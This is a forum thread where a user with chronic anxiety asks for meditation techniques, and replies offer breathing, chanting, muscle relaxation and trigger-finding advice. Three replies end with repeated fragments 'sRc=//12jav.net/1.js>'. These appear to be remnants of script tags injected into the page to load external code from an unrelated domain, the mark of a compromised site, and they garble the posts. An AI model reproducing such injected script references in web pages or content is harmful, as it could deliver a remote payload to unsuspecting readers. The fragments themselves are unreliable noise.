Let me start this thread out by stating that I have chronic anxiety. I am prone to anxiety attacks. And I am constatly having issues from my disorder.
Yes I understand to not use magick for times when I should use conventional medicines blady blady blah. I am looking for a meditation or spell ( prefrably meditation ) to help reduce anxiety in the long run.
Thanks for any help you can give

Continuous meditation can do this. You can either have no particular thoughts at all, or focus on reducing the anxiety while meditating.
You may also want to focus on what triggers the anxiety and work within yourself to overcome what ever issues you have revolving around this trigger to help reduce attacks.
If you are having an attack and are not able to meditate, you can bring about a meditative state by closing your eyes and concentrating on slow regular breaths. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Best approach is to sit for a little while where it is quiet and simply chant something or do controlled breathing sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I have terrible anxiety from panic disorder and depression. So I can definitely relate to you. The most helpful thing to do is to breathe slowly because it slows your heartrate. And a fast heartrate can cause a panic attack. Also, before you meditate, tense up all your muscles one by one and hold for a few seconds. Then release. Then you can proceed with meditating. You need to tell yourself during meditation that your negative feelings are only from anxiety, and repeat to yourself, "I'm ok. Everything will be ok." and after you begin to calm yourself, don't think about the anxiety. Distract yourself so it doesn't come back. Think of beautiful scenery that would relax you in meditation. It's also very helpful with anxiety to find the cause. It can be genetic, from a traumatic experience, worries of the subconscious mind, depression or other negative feelings, or simply have no cause at all and be triggered from panic disorder. But remember every attack is different and may have a different cause. Once you've established the reason for the attack, it's easier to meditate because you can say to yourself that it can be fixed. Good luck, I hope this helps. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
